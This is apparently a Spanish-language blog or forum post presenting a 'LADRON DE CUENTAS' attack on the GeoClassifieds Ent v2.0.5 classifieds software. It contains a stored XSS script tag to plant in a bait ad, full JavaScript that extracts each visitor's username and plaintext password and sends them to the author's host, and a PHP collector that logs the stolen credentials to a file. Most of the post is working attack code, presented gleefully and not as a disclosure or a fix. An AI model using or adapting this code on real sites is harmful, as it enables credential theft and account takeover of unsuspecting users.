Robo de credenciales en GeoClassifieds Ent v2.0.5

GeoClassifieds Ent v2.0.5 es un conjunto NO GRATIS de scripts php que facilita la publicación y administración de clasificados de compras/ventas web. Este producto tristemente tiene un MUY POBRE esquema de seguridad: Guarda los passwords en texto plano, y permite la inserción de código HTML en los anuncios... Esta combinación me permite crear un "LADRON DE CUENTAS":
En el sitio con un GeoClassifieds vulnerable posteamos un anuncio bien atractivo (por ejemplo: Vendo PlayStation 3 con dos controles en RD$3000.00) que contenga este código...

<script type='text/html' src='http://milaboratorio/geoladron.js'></script>

Y en la tranquilidad de mi laboratorio: geoladron.js

function robatelo(){ var fr=document.getElementById('tolete'); var t=fr.contentDocument.firstChild.innerHTML; var user=t.slice(t.indexOf('values">',t.indexOf('Usuario:'))+8); user=user.slice(0,user.indexOf('\n')); var pass=t.slice(t.indexOf('password')+18);pass=pass.slice(0,pass.indexOf('"')); var a=escape('Pagina: '+top.location+' User: '+user+' Pass: '+pass); fr.src='http://milaboratorio/geoladron.php?c='+a }

y tambien gladron.php

<?php $s=urldecode($_GET['c']); $f=fopen("patorobao.txt","a+"); fwrite($f,$s."\n"); fclose($f); ?>

Todo el vivo que entre en ese anuncio ejecutara el script y su usuario y password terminara en http://milaboratorio/patorobao.txt :)


Saludos y Gracias a mi brother [ArDeBaran] por su colaboración en esta investigación :)